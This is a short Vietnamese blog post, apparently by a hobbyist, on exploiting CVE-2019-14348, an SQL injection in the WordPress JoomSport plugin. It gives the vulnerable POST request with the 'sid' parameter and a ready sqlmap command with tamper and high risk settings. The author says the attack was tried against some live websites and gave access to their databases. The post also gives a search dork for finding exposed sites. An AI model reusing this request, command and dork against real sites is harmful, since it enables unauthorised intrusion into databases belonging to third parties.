Ngày hôm nay mình có thấy một cve mới được công bố là CVE-2019-14348 trên wordpress với lỗ hổng sql injection nên cũng thử khai thác xem sao
Theo như trên exploit-db thì lỗi này gặp ở dữ liệu sid trong post của plugin wordpress joomsport có thể chèn và chạy được các câu lệnh sql injection để tấn công website
cụ thể như sau
POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DNT: 1
Connection: close
Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
Upgrade-Insecure-Requests: 1
sid=1&page=1&jscurtab=
Sau một hồi nghiên cứu nó với sqlmap thì mình xây dựng payload như sau
sqlmap -r test.req -p sid --banner --tamper=space2comment --level 5 --risk 3
Kết quả test online một số trang
Như vậy minh có thể cân thiệp được vào database của trang.
dork search vụ này là:
intext:powered by JoomSport - sport WordPress plugin
Hello, Tôi là Một anh chàng ăn xin ăn may vớ được cái bánh mỳ trong thùng rác. nếu bạn thích blog này hãy cho những người ăn xin ngoài đường 1 bữa ăn.
Không có nhận xét nào:
Đăng nhận xét